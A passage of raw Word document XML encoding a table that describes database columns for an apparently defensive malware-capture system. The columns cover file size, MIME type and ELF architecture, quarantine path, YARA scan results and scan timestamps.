                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Secondary hash for external look-ups.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">BIGINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Bytes stored (capped at CAPTURE_MAX_BYTES, 10 MB).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">mime_type, arch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Type from magic bytes; ELF CPU architecture, e.g. ARM (32-bit LE).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">storage_path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Quarantine path (mode 0400); never returned by the API.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">yara_result, yara_matches</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT, TEXT[]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">CLEAN, family list or UNAVAILABLE, and the matched rule names; NULL means not scanned yet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">scanned_at</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TIMESTAMPTZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE, partial INDEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Set by the intelligence engine after the YARA scan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="46E90CCB" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">intel_state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Setting name, e.g. last_daily_report.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
